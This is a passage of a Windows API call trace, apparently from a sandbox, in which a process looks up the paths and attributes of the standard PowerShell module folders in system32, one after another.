SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", lpFilePart=0x0) returned 0x3c [0263.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0263.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x43, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", lpFilePart=0x0) returned 0x42 [0263.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc02299f, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x46 [0263.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations", nBufferLength=0x46, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations", lpFilePart=0x0) returned 0x45 [0263.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\processmitigations"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0263.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning", nBufferLength=0x40, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning", lpFilePart=0x0) returned 0x3f [0263.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\provisioning"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0x40134965, ftLastWriteTime.dwHighDateTime=0x1d61756, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0263.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0263.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0263.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0263.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0263.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0263.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d [0263.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0263.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x45, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44 [0263.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0263.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", nBufferLength=0x42, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", lpFilePart=0x0) returned 0x41 [0263.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot", lpFilePart=0x0) returned 0x3d [0263.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0263.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare", nBufferLength=0x3c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0263.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d8178a, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0263.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d8178a, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0263.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout", nBufferLength=0x3f, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0263.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.118] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d8178a, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0263.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", nBufferLength=0x3b, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0263.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.118] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0263.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache", nBufferLength=0x43, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache", lpFilePart=0x0) returned 0x42 [0263.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storagebuscache"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0263.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", nBufferLength=0x37, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS", lpFilePart=0x0) returned 0x36 [0263.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0263.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0263.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0263.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", nBufferLength=0x49, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule", lpFilePart=0x0) returned 0x48 [0263.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, 